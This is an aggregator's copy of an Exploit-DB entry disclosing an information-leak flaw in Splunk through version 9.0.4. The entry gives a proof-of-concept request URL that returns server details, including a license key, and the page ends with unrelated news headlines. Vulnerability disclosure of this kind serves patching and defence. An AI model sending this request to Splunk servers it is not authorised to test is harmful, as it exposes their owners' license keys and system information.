[webapps] Splunk 9.0.4 - Information Disclosure

7 months ago

source link: https://www.exploit-db.com/exploits/51792
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Splunk 9.0.4 - Information Disclosure

EDB-ID:

51792

EDB Verified:

Platform:

Multiple

Date:

2024-02-13

Vulnerable App:

# Exploit Title: Splunk 9.0.4 - Information Disclosure
# Date: 2023-09-18
# Exploit Author: Parsa rezaie khiabanloo
# Vendor Homepage: https://www.splunk.com/
# Version: 9.0.4 
# Tested on: Windows OS

# Splunk through 9.0.4  allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.

# PoC :

https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

Copy

Recommend

[webapps] Splunk 9.0.4 - Information Disclosure

Splunk 9.0.4 - Information Disclosure

EDB-ID:

51792

Platform:

Multiple

Date:

2024-02-13

Recommend

苹果晒 Vision Pro 头显应用成绩：超 1000 款原生、150 万款兼容

Kotlin Coroutines: Fundamentals [SUBSCRIBER]

Upgrade your diagramming game with Microsoft Visio for just $29 | TechSpot

Show HN: Instantly play the game I'm developing directly on its website

不懂商业逻辑，怎么创业？｜商业

OpenAI CEO Warns That 'Societal Misalignments' Could Make AI Dangerous - Slashdo...

Sam Altman's $7 Trillion Chip Dreams Are Way Off the Mark, Says Nvidia CEO

The Nothing Phone (2a) won't be coming to the US, some specs confirmed

One Project At A Time, Or A Dozen?

NYC Fails Controversial Remote Learning Snow Day 'Test,' Public Schools Chancell...

About Joyk